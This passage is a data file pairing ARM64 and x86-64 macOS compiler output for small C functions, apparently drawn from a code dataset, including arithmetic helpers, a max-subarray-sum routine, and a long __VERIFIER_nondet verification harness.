movzwl (%rax), %eax
andl $3, %eax
cmpl $0, %eax
jne LBB0_5
## %bb.4: ## in Loop: Header=BB0_3 Depth=1
jmp LBB0_3
LBB0_5:
movq -16(%rbp), %rax
movzwl (%rax), %eax
andl $1, %eax
cmpl $0, %eax
je LBB0_7
## %bb.6:
movq -16(%rbp), %rax
movw $4, (%rax)
movl $65535, -4(%rbp) ## imm = 0xFFFF
jmp LBB0_8
LBB0_7:
movq -16(%rbp), %rax
movzwl 2(%rax), %eax
andl $255, %eax
movl %eax, -4(%rbp)
LBB0_8:
movl -4(%rbp), %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/68887639.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _foo ; -- Begin function foo
.p2align 2
_foo: ; @foo
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str w0, [sp, #12]
ldr w9, [sp, #12]
mov w8, #2
mul w0, w8, w9
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _foo ## -- Begin function foo
.p2align 4, 0x90
_foo: ## @foo
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl %edi, -4(%rbp)
movl -4(%rbp), %eax
shll $1, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/87638922.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _threads_runnable ; -- Begin function threads_runnable
.p2align 2
_threads_runnable: ; @threads_runnable
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str x0, [sp, #8]
str x1, [sp]
mov w0, #-1
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _threads_runnable ## -- Begin function threads_runnable
.p2align 4, 0x90
_threads_runnable: ## @threads_runnable
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movl $4294967295, %eax ## imm = 0xFFFFFFFF
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/844471.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _test ; -- Begin function test
.p2align 2
_test: ; @test
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str w0, [sp, #12]
str w1, [sp, #8]
ldr w8, [sp, #12]
ldr w9, [sp, #8]
udiv w0, w8, w9
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _test ## -- Begin function test
.p2align 4, 0x90
_test: ## @test
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl %edi, -4(%rbp)
movl %esi, -8(%rbp)
movl -4(%rbp), %eax
xorl %edx, %edx
divl -8(%rbp)
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/1176997.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _foo ; -- Begin function foo
.p2align 2
_foo: ; @foo
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str w0, [sp, #8]
str x1, [sp]
ldr w8, [sp, #8]
subs w8, w8, #0
cset w8, gt
and w8, w8, #0x1
ldr x9, [sp]
str w8, [x9]
ldr w0, [sp, #12]
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _foo ## -- Begin function foo
.p2align 4, 0x90
_foo: ## @foo
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl %edi, -8(%rbp)
movq %rsi, -16(%rbp)
cmpl $0, -8(%rbp)
setg %al
andb $1, %al
movzbl %al, %ecx
movq -16(%rbp), %rax
movl %ecx, (%rax)
movl -4(%rbp), %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/108968.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _MaxSum ; -- Begin function MaxSum
.p2align 2
_MaxSum: ; @MaxSum
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur w1, [x29, #-12]
ldur x8, [x29, #-8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
ldur w8, [x29, #-12]
subs w8, w8, #0
cset w8, hi
tbnz w8, #0, LBB0_3
b LBB0_2
LBB0_2:
b LBB0_20
LBB0_3:
str wzr, [sp, #16]
str wzr, [sp, #12]
str wzr, [sp, #8]
str wzr, [sp, #8]
b LBB0_4
LBB0_4: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #8]
ldur w9, [x29, #-12]
subs w8, w8, w9
cset w8, hs
tbnz w8, #0, LBB0_11
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_4 Depth=1
ldur x8, [x29, #-8]
ldrsw x9, [sp, #8]
ldr w9, [x8, x9, lsl #2]
ldr w8, [sp, #16]
add w8, w8, w9
str w8, [sp, #16]
ldr w8, [sp, #16]
subs w8, w8, #0
cset w8, ge
tbnz w8, #0, LBB0_7
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_4 Depth=1
str wzr, [sp, #16]
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_4 Depth=1
ldr w8, [sp, #16]
ldr w9, [sp, #12]
subs w8, w8, w9
cset w8, le
tbnz w8, #0, LBB0_9
b LBB0_8
LBB0_8: ; in Loop: Header=BB0_4 Depth=1
ldr w8, [sp, #16]
str w8, [sp, #12]
b LBB0_9
LBB0_9: ; in Loop: Header=BB0_4 Depth=1
b LBB0_10
LBB0_10: ; in Loop: Header=BB0_4 Depth=1
ldr w8, [sp, #8]
add w8, w8, #1
str w8, [sp, #8]
b LBB0_4
LBB0_11:
ldr w8, [sp, #12]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_19
b LBB0_12
LBB0_12:
ldur x8, [x29, #-8]
ldr w8, [x8]
str w8, [sp, #12]
mov w8, #1
str w8, [sp, #8]
b LBB0_13
LBB0_13: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #8]
ldur w9, [x29, #-12]
subs w8, w8, w9
cset w8, hs
tbnz w8, #0, LBB0_18
b LBB0_14
LBB0_14: ; in Loop: Header=BB0_13 Depth=1
ldur x8, [x29, #-8]
ldrsw x9, [sp, #8]
ldr w8, [x8, x9, lsl #2]
ldr w9, [sp, #12]
subs w8, w8, w9
cset w8, le
tbnz w8, #0, LBB0_16
b LBB0_15
LBB0_15: ; in Loop: Header=BB0_13 Depth=1
ldur x8, [x29, #-8]
ldrsw x9, [sp, #8]
ldr w8, [x8, x9, lsl #2]
str w8, [sp, #12]
b LBB0_16
LBB0_16: ; in Loop: Header=BB0_13 Depth=1
b LBB0_17
LBB0_17: ; in Loop: Header=BB0_13 Depth=1
ldr w8, [sp, #8]
add w8, w8, #1
str w8, [sp, #8]
b LBB0_13
LBB0_18:
b LBB0_19
LBB0_19:
ldr w9, [sp, #12]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
b LBB0_20
LBB0_20:
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "maxSum: %d\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _MaxSum ## -- Begin function MaxSum
.p2align 4, 0x90
_MaxSum: ## @MaxSum
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movl %esi, -12(%rbp)
cmpq $0, -8(%rbp)
je LBB0_2
## %bb.1:
cmpl $0, -12(%rbp)
ja LBB0_3
LBB0_2:
jmp LBB0_20
LBB0_3:
movl $0, -16(%rbp)
movl $0, -20(%rbp)
movl $0, -24(%rbp)
movl $0, -24(%rbp)
LBB0_4: ## =>This Inner Loop Header: Depth=1
movl -24(%rbp), %eax
cmpl -12(%rbp), %eax
jae LBB0_11
## %bb.5: ## in Loop: Header=BB0_4 Depth=1
movq -8(%rbp), %rax
movslq -24(%rbp), %rcx
movl (%rax,%rcx,4), %eax
addl -16(%rbp), %eax
movl %eax, -16(%rbp)
cmpl $0, -16(%rbp)
jge LBB0_7
## %bb.6: ## in Loop: Header=BB0_4 Depth=1
movl $0, -16(%rbp)
LBB0_7: ## in Loop: Header=BB0_4 Depth=1
movl -16(%rbp), %eax
cmpl -20(%rbp), %eax
jle LBB0_9
## %bb.8: ## in Loop: Header=BB0_4 Depth=1
movl -16(%rbp), %eax
movl %eax, -20(%rbp)
LBB0_9: ## in Loop: Header=BB0_4 Depth=1
jmp LBB0_10
LBB0_10: ## in Loop: Header=BB0_4 Depth=1
movl -24(%rbp), %eax
addl $1, %eax
movl %eax, -24(%rbp)
jmp LBB0_4
LBB0_11:
cmpl $0, -20(%rbp)
jne LBB0_19
## %bb.12:
movq -8(%rbp), %rax
movl (%rax), %eax
movl %eax, -20(%rbp)
movl $1, -24(%rbp)
LBB0_13: ## =>This Inner Loop Header: Depth=1
movl -24(%rbp), %eax
cmpl -12(%rbp), %eax
jae LBB0_18
## %bb.14: ## in Loop: Header=BB0_13 Depth=1
movq -8(%rbp), %rax
movslq -24(%rbp), %rcx
movl (%rax,%rcx,4), %eax
cmpl -20(%rbp), %eax
jle LBB0_16
## %bb.15: ## in Loop: Header=BB0_13 Depth=1
movq -8(%rbp), %rax
movslq -24(%rbp), %rcx
movl (%rax,%rcx,4), %eax
movl %eax, -20(%rbp)
LBB0_16: ## in Loop: Header=BB0_13 Depth=1
jmp LBB0_17
LBB0_17: ## in Loop: Header=BB0_13 Depth=1
movl -24(%rbp), %eax
addl $1, %eax
movl %eax, -24(%rbp)
jmp LBB0_13
LBB0_18:
jmp LBB0_19
LBB0_19:
movl -20(%rbp), %esi
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
LBB0_20:
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "maxSum: %d\n"
.subsections_via_symbols
| the_stack_data/111355.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl ___VERIFIER_nondet_bool ; -- Begin function __VERIFIER_nondet_bool
.p2align 2
___VERIFIER_nondet_bool: ; @__VERIFIER_nondet_bool
.cfi_startproc
; %bb.0:
stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 16
mov x29, sp
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
bl ___VERIFIER_nondet_int
subs w8, w0, #0
cset w8, ne
and w0, w8, #0x1
ldp x29, x30, [sp], #16 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #320
.cfi_def_cfa_offset 320
stp x28, x27, [sp, #288] ; 16-byte Folded Spill
stp x29, x30, [sp, #304] ; 16-byte Folded Spill
add x29, sp, #304
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
stur wzr, [x29, #-20]
bl ___VERIFIER_nondet_int
str w0, [sp, #88]
bl ___VERIFIER_nondet_bool
stur w0, [x29, #-24]
bl ___VERIFIER_nondet_bool
stur w0, [x29, #-32]
bl ___VERIFIER_nondet_bool
stur w0, [x29, #-40]
bl ___VERIFIER_nondet_float
stur s0, [x29, #-48]
bl ___VERIFIER_nondet_float
stur s0, [x29, #-56]
bl ___VERIFIER_nondet_float
stur s0, [x29, #-64]
bl ___VERIFIER_nondet_float
stur s0, [x29, #-72]
bl ___VERIFIER_nondet_float
stur s0, [x29, #-80]
bl ___VERIFIER_nondet_float
stur s0, [x29, #-88]
bl ___VERIFIER_nondet_bool
stur w0, [x29, #-96]
bl ___VERIFIER_nondet_float
stur s0, [x29, #-104]
bl ___VERIFIER_nondet_float
stur s0, [x29, #-112]
bl ___VERIFIER_nondet_float
stur s0, [x29, #-120]
bl ___VERIFIER_nondet_float
stur s0, [x29, #-128]
bl ___VERIFIER_nondet_float
stur s0, [x29, #-136]
bl ___VERIFIER_nondet_float
stur s0, [x29, #-144]
bl ___VERIFIER_nondet_float
str s0, [sp, #152]
bl ___VERIFIER_nondet_float
str s0, [sp, #144]
bl ___VERIFIER_nondet_float
str s0, [sp, #136]
bl ___VERIFIER_nondet_float
str s0, [sp, #128]
bl ___VERIFIER_nondet_float
str s0, [sp, #120]
bl ___VERIFIER_nondet_float
str s0, [sp, #112]
bl ___VERIFIER_nondet_float
str s0, [sp, #104]
bl ___VERIFIER_nondet_float
str s0, [sp, #96]
ldur s0, [x29, #-72]
fcvt d2, s0
ldur s0, [x29, #-48]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, ls
tbnz w8, #0, LBB1_5
b LBB1_1
LBB1_1:
ldur w8, [x29, #-96]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #80] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_7
b LBB1_2
LBB1_2:
ldur s0, [x29, #-88]
fcvt d2, s0
ldur s0, [x29, #-80]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d1, d0, d1, d2
fmov d0, #-7.00000000
fcmp d0, d1
cset w8, ls
tbnz w8, #0, LBB1_5
b LBB1_3
LBB1_3:
ldur s0, [x29, #-72]
fcvt d2, s0
ldur s0, [x29, #-48]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #80] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_7
b LBB1_4
LBB1_4:
ldur w8, [x29, #-40]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #80] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_7
b LBB1_5
LBB1_5:
ldur w8, [x29, #-32]
subs w8, w8, #0
cset w8, ne
mov w9, #0
str w9, [sp, #80] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_7
b LBB1_6
LBB1_6:
ldur w8, [x29, #-24]
subs w8, w8, #0
cset w8, eq
str w8, [sp, #80] ; 4-byte Folded Spill
b LBB1_7
LBB1_7:
ldr w8, [sp, #80] ; 4-byte Folded Reload
and w8, w8, #0x1
str w8, [sp, #84]
b LBB1_8
LBB1_8: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #88]
subs w8, w8, #0
cset w8, lt
mov w9, #0
str w9, [sp, #76] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_10
b LBB1_9
LBB1_9: ; in Loop: Header=BB1_8 Depth=1
ldr w8, [sp, #84]
subs w8, w8, #0
cset w8, ne
str w8, [sp, #76] ; 4-byte Folded Spill
b LBB1_10
LBB1_10: ; in Loop: Header=BB1_8 Depth=1
ldr w8, [sp, #76] ; 4-byte Folded Reload
tbz w8, #0, LBB1_455
b LBB1_11
LBB1_11: ; in Loop: Header=BB1_8 Depth=1
ldur w8, [x29, #-32]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_14
b LBB1_12
LBB1_12: ; in Loop: Header=BB1_8 Depth=1
ldur w8, [x29, #-24]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_14
b LBB1_13
LBB1_13: ; in Loop: Header=BB1_8 Depth=1
bl ___VERIFIER_nondet_int
str w0, [sp, #88]
b LBB1_15
LBB1_14: ; in Loop: Header=BB1_8 Depth=1
ldr w8, [sp, #88]
subs w8, w8, #1
str w8, [sp, #88]
b LBB1_15
LBB1_15: ; in Loop: Header=BB1_8 Depth=1
bl ___VERIFIER_nondet_bool
stur w0, [x29, #-28]
bl ___VERIFIER_nondet_bool
stur w0, [x29, #-36]
bl ___VERIFIER_nondet_bool
stur w0, [x29, #-44]
bl ___VERIFIER_nondet_float
stur s0, [x29, #-52]
bl ___VERIFIER_nondet_float
stur s0, [x29, #-60]
bl ___VERIFIER_nondet_float
stur s0, [x29, #-68]
bl ___VERIFIER_nondet_float
stur s0, [x29, #-76]
bl ___VERIFIER_nondet_float
stur s0, [x29, #-84]
bl ___VERIFIER_nondet_float
stur s0, [x29, #-92]
bl ___VERIFIER_nondet_bool
stur w0, [x29, #-100]
bl ___VERIFIER_nondet_float
stur s0, [x29, #-108]
bl ___VERIFIER_nondet_float
stur s0, [x29, #-116]
bl ___VERIFIER_nondet_float
stur s0, [x29, #-124]
bl ___VERIFIER_nondet_float
stur s0, [x29, #-132]
bl ___VERIFIER_nondet_float
stur s0, [x29, #-140]
bl ___VERIFIER_nondet_float
stur s0, [x29, #-148]
bl ___VERIFIER_nondet_float
str s0, [sp, #148]
bl ___VERIFIER_nondet_float
str s0, [sp, #140]
bl ___VERIFIER_nondet_float
str s0, [sp, #132]
bl ___VERIFIER_nondet_float
str s0, [sp, #124]
bl ___VERIFIER_nondet_float
str s0, [sp, #116]
bl ___VERIFIER_nondet_float
str s0, [sp, #108]
bl ___VERIFIER_nondet_float
str s0, [sp, #100]
bl ___VERIFIER_nondet_float
str s0, [sp, #92]
ldr s0, [sp, #104]
fcvt d2, s0
ldur s0, [x29, #-116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-5.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_16
LBB1_16: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-80]
fcvt d2, s0
ldur s0, [x29, #-116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_17
LBB1_17: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #120]
fcvt d2, s0
ldur s0, [x29, #-116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-10.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_18
LBB1_18: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #136]
fcvt d2, s0
ldur s0, [x29, #-116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-7.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_19
LBB1_19: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #128]
fcvt d2, s0
ldur s0, [x29, #-116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-19.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_20
LBB1_20: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-144]
fcvt d2, s0
ldur s0, [x29, #-116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-15.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_21
LBB1_21: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-136]
fcvt d2, s0
ldur s0, [x29, #-116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-2.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_22
LBB1_22: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #96]
fcvt d2, s0
ldur s0, [x29, #-116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-20.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_23
LBB1_23: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-120]
fcvt d2, s0
ldur s0, [x29, #-116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-16.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_24
LBB1_24: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-104]
fcvt d2, s0
ldur s0, [x29, #-116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-4.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_25
LBB1_25: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #104]
fcvt d2, s0
ldur s0, [x29, #-116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-5.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_35
b LBB1_26
LBB1_26: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-80]
fcvt d2, s0
ldur s0, [x29, #-116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_35
b LBB1_27
LBB1_27: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #120]
fcvt d2, s0
ldur s0, [x29, #-116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-10.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_35
b LBB1_28
LBB1_28: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #136]
fcvt d2, s0
ldur s0, [x29, #-116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-7.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_35
b LBB1_29
LBB1_29: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #128]
fcvt d2, s0
ldur s0, [x29, #-116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-19.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_35
b LBB1_30
LBB1_30: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-144]
fcvt d2, s0
ldur s0, [x29, #-116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-15.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_35
b LBB1_31
LBB1_31: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-136]
fcvt d2, s0
ldur s0, [x29, #-116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-2.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_35
b LBB1_32
LBB1_32: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #96]
fcvt d2, s0
ldur s0, [x29, #-116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-20.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_35
b LBB1_33
LBB1_33: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-120]
fcvt d2, s0
ldur s0, [x29, #-116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-16.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_35
b LBB1_34
LBB1_34: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-104]
fcvt d2, s0
ldur s0, [x29, #-116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-4.00000000
fcmp d0, d1
cset w8, ne
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_35
LBB1_35: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #112]
fcvt d2, s0
ldur s0, [x29, #-124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-8.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_36
LBB1_36: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-56]
fcvt d2, s0
ldur s0, [x29, #-124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-19.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_37
LBB1_37: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-48]
fcvt d2, s0
ldur s0, [x29, #-124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-7.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_38
LBB1_38: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-128]
fcvt d2, s0
ldur s0, [x29, #-124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-11.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_39
LBB1_39: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-72]
fcvt d2, s0
ldur s0, [x29, #-124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-16.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_40
LBB1_40: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-144]
fcvt d2, s0
ldur s0, [x29, #-124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-18.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_41
LBB1_41: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #152]
fcvt d2, s0
ldur s0, [x29, #-124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-18.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_42
LBB1_42: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-136]
fcvt d2, s0
ldur s0, [x29, #-124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_43
LBB1_43: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-112]
fcvt d2, s0
ldur s0, [x29, #-124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-20.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_44
LBB1_44: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-120]
fcvt d2, s0
ldur s0, [x29, #-124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-10.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
